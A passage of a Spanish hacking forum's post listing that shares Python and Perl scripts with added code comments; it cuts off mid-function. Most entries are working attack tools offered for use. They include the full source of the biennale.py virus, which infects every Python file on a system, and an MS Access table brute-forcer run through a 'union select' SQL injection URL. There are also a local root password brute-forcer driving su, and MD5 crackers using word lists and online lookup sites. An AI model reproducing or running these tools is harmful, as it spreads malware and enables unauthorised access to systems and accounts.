
#21
Python / MD5 Hash Brute Force con Diccionario
Enero 30, 2011, 10:11:37 AM
Código: python
#!/usr/bin/env python

import md5, sys, hashlib

def main():
    """Dispatch on the command line.

    Four arguments with '-e' run encriptar(); five arguments with '-c' run
    crakeo(); every other shape prints the usage text via uso().
    """
    argc = len(sys.argv)
    mode = sys.argv[1] if argc > 1 else None
    if argc == 4 and mode == '-e':
        encriptar()
    elif argc == 5 and mode == '-c':
        crakeo()
    else:
        uso()

def uso():
    """Print the usage banner; the program name is taken from sys.argv[0]."""
    prog = sys.argv[0]
    banner = [
        "Encriptador y crakeador:",
        "Forma de uso:",
        "Para encriptar: %s y -e -opcion palabra" % prog,
        "Para crakear: python %s -c -opcion hash diccionario.txt" % prog,
        "opciones: -md5 || -sha1",
        "Kalith: Kalith.9[at]gmail[dot]com",
        "http://0x59.es",
    ]
    for text in banner:
        print(text)

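def crakeo():
    """Look the hash given in sys.argv[3] up in the word list named in sys.argv[4].

    sys.argv[2] selects the digest ('-md5' or '-sha1'); anything else prints
    the usage text. The word list is opened in a `with` block so it is closed
    on every path: the original relied on crak_md5/crak_sha1 closing it, and
    they only do so when the hash length check passes.

    Raises nothing: an unreadable file is reported on stdout (IOError).
    """
    a = False
    hash = sys.argv[3]
    try:
        with open(sys.argv[4], 'r') as dicc:
            if sys.argv[2] == '-md5':
                crak_md5(a, hash, dicc)
            elif sys.argv[2] == '-sha1':
                crak_sha1(a, hash, dicc)
            else:
                uso()
    except IOError:
        print("Debe ser un archivo de texto valido... verificalo porfavor")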

def crak_md5(a, hash, dicc):
    """Compare the MD5 of every whitespace-separated word in `dicc` with `hash`.

    `a` is the caller's "already found" flag: when it is true and nothing
    matches, no "not found" line is printed. A hash that is not 32 characters
    long is rejected without reading the file. The file is closed only on the
    32-character path, exactly as before.
    """
    if len(hash) != 32:
        print("Debe estar en md5")
        return
    print("El hash esta siendo crakeado... espera porfavor..")
    words = (w for line in dicc for w in line.split())
    match = next((w for w in words if md5.new(w).hexdigest() == hash), None)
    if match is not None:
        print("%s es el producto encriptado de %s" % (hash, match))
    elif not a:
        print("El hash no se pudo crakear...")
    dicc.close()

def crak_sha1(a, hash, dicc):
    """Compare the SHA-1 of every whitespace-separated word in `dicc` with `hash`.

    Mirrors crak_md5: `a` suppresses the "not found" line when true, a hash
    that is not 40 characters long is rejected before the file is read, and
    the file is closed only on the 40-character path.
    """
    if len(hash) != 40:
        print("Debe estar en sha1..")
        return
    print("El hash esta siendo crakeado... espera porfavor..")
    words = (w for line in dicc for w in line.split())
    match = next((w for w in words if hashlib.sha1(w).hexdigest() == hash), None)
    if match is not None:
        print("%s es el producto encriptado de %s" % (hash, match))
    elif not a:
        print("El hash no se pudo crakear...")
    dicc.close()

def encriptar():
    """Print the digest of sys.argv[3] chosen by sys.argv[2] ('-md5' / '-sha1');
    an unknown option prints the usage text instead."""
    handlers = {'-md5': encr_md5, '-sha1': encr_sha1}
    handler = handlers.get(sys.argv[2])
    if handler is None:
        uso()
    else:
        print(handler())

def encr_md5():
    """Return the result line for the MD5 hex digest of sys.argv[3]."""
    digest = md5.new(sys.argv[3]).hexdigest()
    return "El resultado es: " + digest

def encr_sha1():
    """Return the result line for the SHA-1 hex digest of sys.argv[3]."""
    digest = hashlib.sha1(sys.argv[3]).hexdigest()
    return "El resultado es: " + digest

main()
#22
Python / IRC Bot
Enero 30, 2011, 10:11:18 AM
Código: python
#!/usr/bin/env python

# This is a just for fun experiment bot to learn how IRC works
# My name is Andre and I go by the handle Tr1pX
# Feel free to contact me floridait[--at--]gmail[---dot---]com
# This bot was tested on irc.bluehell.org

import sys
import socket
import string
import time
import os # when I use this import in linux it works but you might have to change it for winblows

# here are our connection variables
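# here are our connection variables
HOST = "irc.bluehell.org"
PORT = 6667
REALNAME = "Ceasar"
# the readbuffer stores all the data the server send to us
readbuffer = ""
# here we give the bot a name (first command-line argument)
try:
    nickname = sys.argv[1]
    print("[+] Joining with name " + nickname)
except IndexError:
    print('-This bot is designed for BlueHell-')
    print('-----Please use xbot.py <nick>-----')
    sys.exit()

CHAN = '#bhf'
NICK = nickname
IDENT = NICK
# here we connect to the irc server. sendall() is used instead of send():
# send() may write only part of the buffer and return the count, so the
# registration lines could have gone out truncated.
s = socket.socket()
s.connect((HOST, PORT))
s.sendall("NICK %s\r\n" % NICK)
s.sendall("USER %s %s bla :%s\r\n" % (IDENT, HOST, REALNAME))
# here are some other variables that we need to set.
# BOTOWNER is compared against the bare nick of the sender, which IRC does
# not authenticate; see give_op()/permission().
BOTOWNER = 'Tr1pX'
things_to_say = [
    'Here\'s 20 cents. Call all your friends and bring back some change! ',
    'Any similarity between you and a human is purely coincidental! ',
    'Calling you stupid would be an insult to stupid people. ',
    'Do you ever wonder what life would be like if you\'d had enough oxygen at birth? ',
    'Do you want people to accept you as you are or do you want them to like you? ',
    'Do you still love nature, despite what it did to you? ',
    'Don\'t you need a license to be that ugly? ',
    'Every person has the right to be ugly, but you abused the privilege! ',
    'You are the kind of a man that you would use as a blueprint to build an idiot. ',
]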
#here goes our functioning part


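def ai(tmp):
    """React to a PRIVMSG line.

    `tmp` is the raw text handed over by the caller (the main loop passes the
    whole read buffer, not one line). It is split into prefix, command,
    target and trailing text; the trailing text is matched against the
    triggers below and every reply goes to CHAN through msg_sender().
    Returns nothing.
    """
    msgstrip = tmp.rstrip().split(' ', 3)
    # A line with fewer than four fields (PING, JOIN, short notices) made
    # the original raise IndexError on msgstrip[3].
    if len(msgstrip) < 4:
        return
    msgtrigger = msgstrip[3]
    sender = msgstrip[0].strip(':').split('!')[0]  # nick part of ":nick!user@host"

    # The original condition `msgstrip[1] == "PRIVMSG" and msgstrip[2] == CHAN or NICK`
    # was always true (`or NICK` is a separate, non-empty operand), so every
    # line reached the trigger checks. Membership in (CHAN, NICK) is what the
    # author's comment describes.
    if msgstrip[1] != "PRIVMSG" or msgstrip[2] not in (CHAN, NICK):
        return

    if msgtrigger == ':' + NICK + ':':
        print("[+] %s mentioned your name!" % sender)  # console output only
        msg_sender(CHAN, ' I am busy right now! I\'ll brb ' + sender)
        return

    # plain chat triggers: trigger -> reply text
    replies = {
        ':lol': sender + ' is laughing out loud!',
        ':hmm': 'What are you thinking about so hard ' + sender + '?',
        ':hello': 'Hello ' + sender + '!',
        ':lmao': sender + ' is laughing his a$$ off!',
    }
    if msgtrigger in replies:
        print("[+] %s typed a known trigger" % sender)
        msg_sender(CHAN, replies[msgtrigger])

    # functional commands
    elif msgtrigger == ':!change.name':
        print("[+] %s gave the command to change the name" % sender)
        msg_sender(CHAN, 'OK! ' + sender + ', I will change my name now.')
        recon_newnick(CHAN, sender)
    elif msgtrigger == ':!exit':
        print("[+] %s gave me the command to exit" % sender)
        msg_sender(CHAN, 'OK! ' + sender + ', let me check if you have permission to turn me off.')
        permission(CHAN, sender)
    elif msgtrigger == ':!commands':
        print("[+] %s has requested a list of commands" % sender)
        msg_sender(CHAN, 'OK! ' + sender + ', here come my commands:')
        msg_sender(CHAN, '[1] !change.name [2] !commands [3] !exit [4] !op.me [5] !diss.me [#] More to come: ' + sender)
    elif msgtrigger == ':!op.me':
        print("[+] %s wants me to give him op" % sender)
        msg_sender(CHAN, 'OK! ' + sender + ', let me see if I can give you Op status.')
        give_op(CHAN, sender)
    elif msgtrigger == ':!diss.me':
        print("[+] %s typed a known trigger" % sender)
        msg_sender(CHAN, 'Ok! ' + sender + ' the following apply to you!')
        for number, text in enumerate(things_to_say, 1):
            time.sleep(3)  # pacing between lines so the bot does not flood
            msg_sender(CHAN, str(number) + '. ' + text)
    # The commented-out !create.army handlers of the original are not revived here.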

#def more_bots (): # this function does work but most irc servers have a host session limit
# b = 0 # so after 3 connects from one host they will be created but the old ones disconnect
# while b < 5: # here you can set the number of bots to enter
# time.sleep(5)
# b = b + 1
# os.popen('python soldier.py soldier'+str(cool.gif) # i dont know if this works in windows but it does in linux



def give_op(channel, commander):
    """Send MODE +o for `commander` on `channel` when the nick equals BOTOWNER,
    otherwise send a refusal; either way reply via msg_sender() and pause 5 s.

    NOTE(review): the check is on the bare nick, which IRC does not
    authenticate. The MODE only takes effect if the bot itself has op.
    """
    authorized = (commander == BOTOWNER)
    if authorized:
        print("[+] %s is recordnized as a authorized user" % commander)
        s.send("MODE " + channel + ' +o ' + commander + '\r\n')
        reply = commander + ', if I had the power to OP you, then you should be OP now!'
    else:
        print("[+] %s has no authority for OP" % commander)
        reply = 'I am sorry ' + commander + ', but you don\'t have permission to be OPed'
    msg_sender(channel, reply)
    time.sleep(5)  # keeps the bot from flooding



def permission(channel, commander):
    """Handle !exit: shut the bot down when `commander` equals BOTOWNER,
    otherwise announce the refusal on `channel`.

    The shutdown path sends PART, waits 5 s and calls sys.exit(); the
    refusal path waits 5 s and returns. The nick is not authenticated.
    """
    if commander != BOTOWNER:
        print("[+] %s has no proper authority!" % commander)
        msg_sender(channel, '[+]Shut down denied[+] ' + commander + ' has no authority!')
        time.sleep(5)
        return
    print("[+] Shutting down connection")
    msg_sender(channel, '[+]Shutting Down[+] Good Bye ' + commander + '!')
    s.send("PART \r\n")
    time.sleep(5)
    sys.exit()


def recon_newnick(channel, commander):
    """Leave, rename the bot to `<commander>s_p3t`, rejoin `channel`, then
    confirm on the channel after a 10 s pause.

    NOTE(review): `commander` comes straight from the sender prefix and is
    written into the NICK line unfiltered.
    """
    new_nick = commander + 's_p3t'
    for raw_line in ("PART \r\n", "NICK " + new_nick + " \r\n", "JOIN " + channel + '\r\n'):
        s.send(raw_line)
    time.sleep(10)
    msg_sender(channel, 'I changed my name ' + commander + ', like you wanted me to.')


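def msg_sender(destination, message):
    """Send one PRIVMSG with `message` to `destination` on the global socket
    `s`, then pause 5 s so the bot does not flood.

    `message` is usually built from the sender's nick, i.e. from data the
    remote side controls. CR/LF are replaced so the text cannot terminate
    the line early and smuggle a second IRC command; sendall() replaces
    send(), which may write only part of the buffer.
    """
    message = message.replace('\r', ' ').replace('\n', ' ')
    s.sendall("PRIVMSG " + destination + " :" + message + "\r\n")
    time.sleep(5)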

def connect_to_channel(check):
    """Send JOIN for CHAN unless the third field of `check` already names it.

    Lines with fewer than three fields raise IndexError, which is caught and
    reported as idling; the intent is to avoid re-joining on every loop pass.
    """
    try:
        fields = check.rstrip().split(' ', 3)
        if fields[2] != CHAN:
            s.send('JOIN ' + CHAN + '\r\n')
    except IndexError:
        print("[+] Ideling")

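# this is our connection loop
while 1:
    data = s.recv(1024)  # at most 1024 bytes per pass
    if not data:
        # recv() returns '' once the server closes the socket; the original
        # kept spinning on an empty buffer forever.
        print("[+] Connection closed by server")
        break
    readbuffer = readbuffer + data
    chan_check = readbuffer
    connect_to_channel(chan_check)
    if readbuffer.find('PRIVMSG') != -1:
        ai(chan_check)  # whole buffer, as before; ai() splits it itself
    temp = readbuffer.split("\n")
    readbuffer = temp.pop()  # keep the unterminated tail for the next recv
    for line in temp:
        line = line.rstrip().split()
        print("[+] %s" % line)
        # an empty line splits to [] and raised IndexError on line[0]
        if len(line) > 1 and line[0] == "PING":
            s.sendall("PONG %s\r\n" % line[1])  # keep-alive reply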
#23
Python / MSaccess Brute Force
Enero 30, 2011, 10:10:52 AM
Un simple brute force de MSaccess usando una lista de palabras predefinidas

Código: python
import sys
import os
import urllib

from urllib import urlopen

# Appends every line of tester.txt to the URL given on the command line and
# prints the lines for which the response contains the Jet/Access
# "columns ... do not match" error text.
os.system("cls")  # Windows-only clear; on other systems the command just fails
print "Access Table Brute v1 Written by nova"
print "-------------------------------------"
print
print "Usage: access-brute.py url"
print "Eg. access-brute.py http://host.com/viewproduct.asp?id=1+union+select+1+From+\n"

url = sys.argv[1]  # no argument check: running without one raises IndexError
# Response text the script treats as the positive signal for a line.
substring = "The number of columns in the two selected tables or queries of a union query do not match"

print url
print
print "Tables:\n"
print "-------"


f = open("tester.txt",'r')  # word list relative to the cwd; never closed
for line in f:
        # NOTE(review): `line` still carries its trailing "\n", so the
        # newline becomes part of the requested URL.
        feeddata = urllib.urlopen(url+line).read()
        s = feeddata
        x = s.count(substring)
        if (x > 0):
            print line

print "-------------"
print "scan complete"


wordlist

Código: php
admin
users
customers
customer
members
clients
tblusers
tbluser
ordermain
orders
sales
stores
titles
msysobjects
MSysAccessObjects
MSysAccessXML
MSysACEs
MSysQueries
MSysRelationships
Northwind
wtblObjectList
#24
Python / Virus en Python
Enero 30, 2011, 10:10:17 AM
Código: python
# biennale.py ________________ go         to _____ 49th Biennale di Venezia
# HTTP://WWW.0100101110101101.ORG __ + __ [epidemiC] http://www.epidemic.ws
from dircache import *
from string import *
import os, sys
from stat import *

def fornicate(guest):
    """Prepend this script's own text (the module global `mybody`, set in the
    __main__ block) to the file `guest`, unless the file already contains
    the "[epidemiC]" marker.

    The marker doubles as the already-infected check, which is also the
    string a scanner can look for. IOError (unreadable or read-only file)
    is swallowed, so such files are skipped silently.
    """
    try:
        soul = open(guest, "r")
        body = soul.read()
        soul.close()
        if find(body, "[epidemiC]") == -1:
            soul = open(guest, "w")
            soul.write(mybody + "\n\n" + body)
            soul.close()
    except IOError: pass       

def chat(party, guest):
    """Call fornicate() on `party + guest` when the file name `guest` ends
    in .py or .pyw (`party` is the directory path, already '/'-terminated)."""
    if split(guest, ".")[-1] in ("py", "pyw"):
        fornicate(party + guest)

def join(party):
    """Walk `party` recursively: every directory entry is passed to chat()
    and then recursed into. Symlinks are not followed (S_ISLNK check).

    A directory whose lower-cased path is in the excluded-paths list, or
    that contains __init__.py, is skipped entirely. OSError (not a
    directory, no permission) is swallowed, which is also what ends the
    recursion on plain files.
    """
    try:
        if not S_ISLNK(os.stat(party)[ST_MODE]):
            guestbook = listdir(party)
            if party != "/": party = party + "/"
            # `****` is the forum's word filter masking an identifier (the
            # list assigned in the __main__ block); as posted this line does
            # not parse.
            if not lower(party) in **** and not "__init__.py" in guestbook:
                for guest in guestbook:
                    chat(party, guest)
                    join(party + guest)
    except OSError: pass
       
if __name__ == '__main__':
        # Read this script's own text up to and including the "###" marker;
        # that slice is what fornicate() prepends to other files.
        mysoul = open(sys.argv[0])
        mybody = mysoul.read()
        mybody = mybody[:find(mybody, "#"*3) + 3]
        mysoul.close()
        # Python's own install prefix (drive letter dropped, backslashes
        # normalised to '/') is excluded from the walk, along with /proc
        # and /dev.
        blacklist = replace(split(sys.exec_prefix,":")[-1], "\\", "/")
        if blacklist[-1] != "/": blacklist = blacklist + "/"
        # `****` is the forum's word filter masking the list's name.
        **** = [lower(blacklist), "/proc/", "/dev/"]
        join("/")
        print ">      This file was contaminated by biennale.py, the world slowest virus."
        print "Either Linux or Windows, biennale.py is definetely the first Python virus."
        print "[epidemiC] http://www.epidemic.ws __ + __ HTTP://WWW.0100101110101101.ORG "
        print "> ______________________ 49th Biennale di Venezia ______________________ <"
###
#25
Python / Anti ARP Poisoning
Enero 30, 2011, 10:09:57 AM
Código: python
#!/usr/bin/python

import os
import subprocess
import sys
import this  # NOTE(review): unused by the script; importing it prints the Zen of Python at start-up
import time



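def AntiArp(Argument):
    """Keep the ARP cache pinned to the IP/MAC pairs listed in the file `Argument`.

    Each non-blank line of the file is `<ip> <mac>` (see the usage text at
    the bottom of the script). On every pass the cache is flushed once and
    each listed pair is re-added as a static entry, with a 10 s pause after
    each `arp -s`. Loops until interrupted; KeyboardInterrupt is handled by
    the caller and IOError from a missing file propagates.

    Fixes relative to the original: `f, e = mot[:d], mot[d+1:]` rebound the
    open file handle `f` to the IP string, so the second readline() raised
    AttributeError; `arp -d *` ran before *every* `arp -s`, wiping the static
    entries just created so only the last pair survived; and the commands
    were built as shell strings from file contents.
    """
    print("Working ...\nPress CTRL+C to Quit")
    while 1:
        entries = _read_entries(Argument)
        # Flush once per pass, then re-add every static entry.
        print("deleting arp table")
        subprocess.call(["arp", "-d", "*"])  # '*' is passed literally, not shell-globbed
        for ip, mac_fields in entries:
            cmd = ["arp", "-s", ip] + mac_fields
            print(" ".join(cmd))
            # List form: tokens read from the file never reach a shell.
            subprocess.call(cmd)
            time.sleep(10)


def _read_entries(path):
    """Return [(ip, [mac fields...]), ...] for every line of `path` that has
    at least two whitespace-separated fields; other lines are skipped (the
    original raised ValueError on a line without a space). The file is
    closed on return."""
    entries = []
    with open(path, 'r') as fh:
        for raw in fh:
            fields = raw.split()
            if len(fields) >= 2:
                entries.append((fields[0], fields[1:]))
    return entries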



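# Entry point: one argument (the cache file) or the usage text.
try:
    if len(sys.argv) < 2:
        # the original literal read "nUsage" (lost backslash)
        print("\nUsage : %s <cache-file>" % sys.argv[0])
        print("<cache-file> where data is : x.x.x.x [MAC Address]")
    else:
        AntiArp(sys.argv[1])
except KeyboardInterrupt:
    print("Stopped")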
#26
Python / Local Root Bruteforce por Wordlist
Enero 30, 2011, 10:09:36 AM
Código: python
#!/usr/bin/python
#Local Root BruteForcer

#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com

import sys
try:
    import pexpect
except(ImportError):
    print "\nYou need the pexpect module."
    print "http://www.noah.org/wiki/Pexpect\n"
    sys.exit(1)

#Change this if needed.
LOGIN_ERROR = 'su: incorrect password'

def brute(word):
    """Try `word` as the password for an interactive `su`.

    On success (a prompt ending in "# " appears) the word is printed,
    `whoami` is run and the terminal is handed to the child via
    interact(); on failure (LOGIN_ERROR appears) the function just
    returns. NOTE(review): each attempt is presumably recorded by su/PAM as
    an authentication failure, which is the signal a host monitor sees.
    """
    print "Trying:",word
    child = pexpect.spawn ('su')
    # NOTE(review): prompt text is locale-dependent; a non-English su makes
    # expect() wait until its timeout.
    child.expect ('Password: ')
    child.sendline (word)
    # index 0 = shell prompt pattern, 1 = LOGIN_ERROR
    i = child.expect (['.+\s#\s',LOGIN_ERROR])
    if i  == 0:
        print "\n\t[!] Root Password:",word
        child.sendline ('whoami')
        print child.before
        child.interact()
    #if i == 1:
        #print "Incorrect Password"

if len(sys.argv) != 2:
    print "\nUsage : ./rootbrute.py <wordlist>"
    print "Eg: ./rootbrute.py words.txt\n"
    sys.exit(1)

try:
    # NOTE(review): the file object is never closed, and readlines() holds
    # the whole list in memory.
    words = open(sys.argv[1], "r").readlines()
except(IOError):
      print "\nError: Check your wordlist path\n"
      sys.exit(1)

print "\n[+] Loaded:",len(words),"words"
print "[+] BruteForcing...\n"
# Only "\n" is stripped; a CRLF word list leaves "\r" on every word.
for word in words:
    brute(word.replace("\n",""))
#27
Es este el tutorial?


Saludos
#28
Perl / Re:Auto-Rooteador
Enero 28, 2011, 04:18:58 PM
Como ha dicho FakedoOr, revisa el código.

Saludos
#29
Perl / Crackeador MD5 [Recomendado]
Enero 27, 2011, 08:56:16 PM
Código: perl
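#!/usr/bin/perl

# NOTE:
# I TAKE NO RESPONSIBILITY FOR THE USE
# MADE OF THE PROGRAM; THE USER
# IS THE ONE RESPONSIBLE.
# SaLuDos :) [by W4rL0cK] (Some rights reserved) 2oo8 [C]
#
#      Last update: 17.March.2008

# The original shebang read "#!usr/bin/perl" (no leading slash), so the
# script could not be executed directly.
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request qw(post);

# The hash to look up comes from the command line; banner() prints the
# usage text and exits when it is missing.
my $hash = shift @ARGV;
banner() unless $hash;
# User-Agent string sent with every lookup request.
my $agent = "Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)";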

# Print the usage text and stop; called when no hash was given.
sub banner {
    print <<"END";

MD5 CRACKER

perl x.pl <hash>
perl x.pl eec4832f1db196790d523a4ab628a899

END
    exit;
}

# Print the run header, validate the file-level $hash (comprobarhash exits on
# a bad one) and announce the search.
sub banner2 {
    print "\n", "MD5 CRACKER\n", "\n";
    print "[+] Comprobando el hash: $hash\n";
    comprobarhash($hash);
    print "[+] Buscando .. \n";
}

# Accept a 32-character hash (stored back into the file-level $hash, as
# every sub here does); anything else prints a message and exits.
sub comprobarhash {
    ($hash) = @_;
    return print "[+] Hash correcto\n" if length($hash) == 32;
    print "[-] Hash invalido\n", "[x] Saliendo\n";
    exit;
}

banner2();
# Query each lookup site in the original order: 0-6, 8-15, then 7, 16-18.
for my $n (0 .. 6, 8 .. 15, 7, 16 .. 18) {
    my $cracker = __PACKAGE__->can("cracker$n");
    $cracker->($hash, $agent);
}

# Look the hash up at md5.thekaine.de (GET); the arguments are copied into
# the file-level $hash/$agent like every other cracker sub.
sub cracker1 {
    ($hash, $agent) = @_;
    my $ua = LWP::UserAgent->new();
    $ua->agent($agent);
    my $html = $ua->get("http://md5.thekaine.de/?hash=$hash")->content;

    # Unescaped HTML fragments interpolated straight into the regex.
    my ($open, $close) = ("<td colspan=\"2\"><br><br><b>", "</b></td><td></td>");
    print "md5.thekaine.de          |   ";
    my ($plain) = $html =~ m/$open(.*)$close/;
    if (defined $plain and $html !~ /not found/) {
        print "Cracked: $plain\n";
    } else {
        print "Not Found\n";
    }
}

# Look the hash up at nz.md5.crysm.net (GET); the answer is the first <li>.
sub cracker2 {
    ($hash, $agent) = @_;
    my $ua = LWP::UserAgent->new();
    $ua->agent($agent);
    my $html = $ua->get("http://nz.md5.crysm.net/find?md5=$hash")->content;

    print "nz.md5.crysm.net         |   ";
    my ($plain) = $html =~ m/<li>(.*)<\/li>/;
    print defined $plain ? "Cracked: $plain\n" : "Not Found\n";
}

#busca en www.tydal.nu/php/sakerhet/
sub cracker3 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://www.tydal.nu/php/sakerhet/md5.php?q=$hash";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $code1 = "";
my $code2 = "</b></h5>";
print "www.tydal.nu             |   ";
if ($resultado->content =~ m/$code1(.*)$code2/) {
if ($resultado->content =~ /Ingen/) {
print "Not Found\n";
} else {
print "Cracked: $1\n";
}
} else {
print "Not Found\n";
}
}

# Look the hash up at milw0rm.com (GET the form page, then POST the hash).
sub cracker4 {
    ($hash, $agent) = @_;
    my $url = "http://milw0rm.com/cracker/search.php";
    my $ua = LWP::UserAgent->new();
    $ua->agent($agent);
    $ua->get($url);    # response unused; kept so the request sequence is unchanged
    my $html = $ua->post($url, ["hash" => $hash, "Submit" => "Submit"])->content;

    my $cell = "</TD><TD align=\"middle\" nowrap=\"nowrap\" width=90>";
    my $tail = $cell . "cracked</TD></TR>";
    print "www.milw0rm.com          |   ";
    my ($plain) = $html =~ m/$cell(.*)$tail/;
    print defined $plain ? "Cracked: $plain\n" : "Not Found\n";
}

#busca en gdataonline.com
sub cracker5 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://gdataonline.com/qkhash.php?mode=txt&hash=$hash";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $code1 = "</td><td width=\"35%\"><b>";
my $code2 = "</b></td></tr>";
print "gdataonline.com          |   ";
if ($resultado->content =~ m/$code1(.*)$code2/) {
print "Cracked: $1\n";
} else {
print "Not Found\n";
}
}

#busca en www.csthis.com
sub cracker6 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://www.csthis.com/md5/index.php";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $request = $conexion->post($url, ["h" => $hash]);
my $content = $request->content;

my $code1 = "resolves to:<br /><b><font color=#00CC66 size=6>";
my $code2 = "</b></font></font>  </p>";
print "www.csthis.com           |   ";
if ($request->content =~ m/$code1(.*)$code2/) {
print "Cracked: $1\n";
} else {
print "Not Found\n";
}
}

# Look the hash up at md5decrypter.com (GET the page, then POST the hash).
# The closing marker is empty, so the capture runs to the end of the line.
sub cracker0 {
    ($hash, $agent) = @_;
    my $url = "http://md5decrypter.com/index.php";
    my $ua = LWP::UserAgent->new();
    $ua->agent($agent);
    $ua->get($url);    # response unused; kept so the request sequence is unchanged
    my $html = $ua->post($url, ["hash" => $hash, "submit" => "Decrypt!"])->content;

    my $marker = "<br/><b class='red'>Normal Text: </b>";
    print "md5decrypter.com         |   ";
    my ($plain) = $html =~ m/$marker(.*)/;
    print defined $plain ? "Cracked: $plain\n" : "Not Found\n";
}

#busca en plain-text.info
# Look the hash up at plain-text.info (GET the form, then POST the hash).
# The result row is parsed in two steps, see the comments inside.
sub cracker7 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://plain-text.info/search/";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
# Static headers added to every request of this agent. NOTE(review):
# "base64" is not a content-coding; the server presumably ignores it.
$conexion->default_header('Host' => "plain-text.info", 'Connection' => "close", 'Accept-Encoding' => "base64", 'Accept' => "text/plain", 'Accept-Language' => "es", 'Referer' => "http://plain-text.info/search/", 'Content-type' => "application/x-www-form-urlencoded");
my $resultado = $conexion->get($url);    # response unused

my $request = $conexion->post($url, ["searchhash" => $hash]);
my $content = $request->content;

# Outer match (/s so it spans lines): everything between the cell holding
# the hash and the "cracked" cell.
my $code1 = "<td>$hash</td>";
my $code2 = "<td>cracked</td>";
print "plain-text.info          |   ";
if ($request->content =~ m/$code1(.*)$code2/s) {
my $cx1 = "<td>";
my $cx2 = "</td>";
# Inner match on the outer $1; after it succeeds $1 is the inner capture,
# and the plaintext is the part of it before the first "</td>".
if($1 =~ m/$cx1(.*)$cx1/s) {
my $longstrx = index($1,$cx2);
my $hashstrx = substr($1,0,$longstrx);
print "Cracked: $hashstrx\n";
}
} else {
print "Not Found\n";
}
}

#busca en md5pass.info
sub cracker8 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://md5pass.info/index.php";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $request = $conexion->post($url, ["hash" => $hash, "get_pass" => "Get Pass"]);
my $content = $request->content;

my $code1 = "Password - <b>";
my $code2 = "</b>";
print "md5pass.info             |   ";
if ($request->content =~ m/$code1(.*)$code2/) {
print "Cracked: $1\n";
} else {
print "Not Found\n";
}
}

# Look the hash up at md5.hashcracking.com (GET). The closing marker is
# empty, so the capture runs to the end of the line.
sub cracker9 {
    ($hash, $agent) = @_;
    my $ua = LWP::UserAgent->new();
    $ua->agent($agent);
    my $html = $ua->get("http://md5.hashcracking.com/search.php?md5=$hash")->content;

    my $marker = "Cleartext of $hash is ";
    print "md5.hashcracking.com     |   ";
    my ($plain) = $html =~ m/$marker(.*)/;
    print defined $plain ? "Cracked: $plain\n" : "Not Found\n";
}

#busca en md5decryption.com
sub cracker10 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://md5decryption.com";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $request = $conexion->post($url, ["hash" => $hash, "submit" => "Decrypt It!"]);
my $content = $request->content;

my $code1 = "<h2>Results</h2><b>Md5 Hash:</b> $hash<br/><b class='red'>Normal Text: </b>";
my $code2 = "<br/>";
print "www.md5decryption.com    |   ";
if ($request->content =~ m/$code1(.*)$code2/) {
print "Cracked: $1\n";
} else {
print "Not Found\n";
}
}

#busca en md5.xpzone.de
sub cracker11 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://md5.xpzone.de/?string=$hash&mode=decrypt";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $code1 = "Code: <b>";
my $code2 = "</b><br>";
print "md5.xpzone.de            |   ";
if ($resultado->content =~ m/$code1(.*)$code2/) {
print "Cracked: $1\n";
} else {
print "Not Found\n";
}
}

#busca en us.md5.crysm.net
sub cracker12 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://us.md5.crysm.net/find?md5=$hash";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $code1 = "<li>";
my $code2 = "</li>";
print "us.md5.crysm.net         |   ";
if ($resultado->content =~ m/$code1(.*)$code2/) {
print "Cracked: $1\n";
} else {
print "Not Found\n";
}
}

#busca en www.hashreverse.com
sub cracker13 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://www.hashreverse.com/index.php?action=view";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $request = $conexion->post($url, ["hash" => $hash, "convert" => "false", "Submit2" => "Search for a SHA1 or MD5 hash"]);
my $content = $request->content;

my $code1 = "Following results were found:<br><ul><li>";
my $code2 = "</li></ul>";
print "www.hashreverse.com      |   ";
if ($request->content =~ m/$code1(.*)$code2/) {
print "Cracked: $1\n";
} else {
print "Not Found\n";
}
}

#busca en www.neeao.com
sub cracker14 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://www.neeao.com/md5/index.asp";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $request = $conexion->post($url, ["q" => $hash, "b" => "MD5-Search"]);
my $content = $request->content;

my $code1 = "</div>Result:";
my $code2 = "    Good Luck!<br />";
print "www.neeao.com            |   ";
if ($request->content =~ m/$code1(.*)$code2/) {
print "Cracked: $1\n";
} else {
print "Not Found\n";
}
}

#busca en www.hashchecker.com
sub cracker15 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://www.hashchecker.com/index.php";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $request = $conexion->post($url, ["search_field" => $hash, "Submit" => "search"]);
my $content = $request->content;

my $code1 = "<td><li>Your md5 hash is :<br><li>$hash is <b>";
my $code2 = "</b> used charlist :2</td>";
print "www.hashchecker.com      |   ";
if ($request->content =~ m/$code1(.*)$code2/) {
print "Cracked: $1\n";
} else {
print "Not Found\n";
}
}

#busca en victorov.su/md5/
sub cracker16 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://victorov.su/md5/?md5e=&md5d=$hash";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

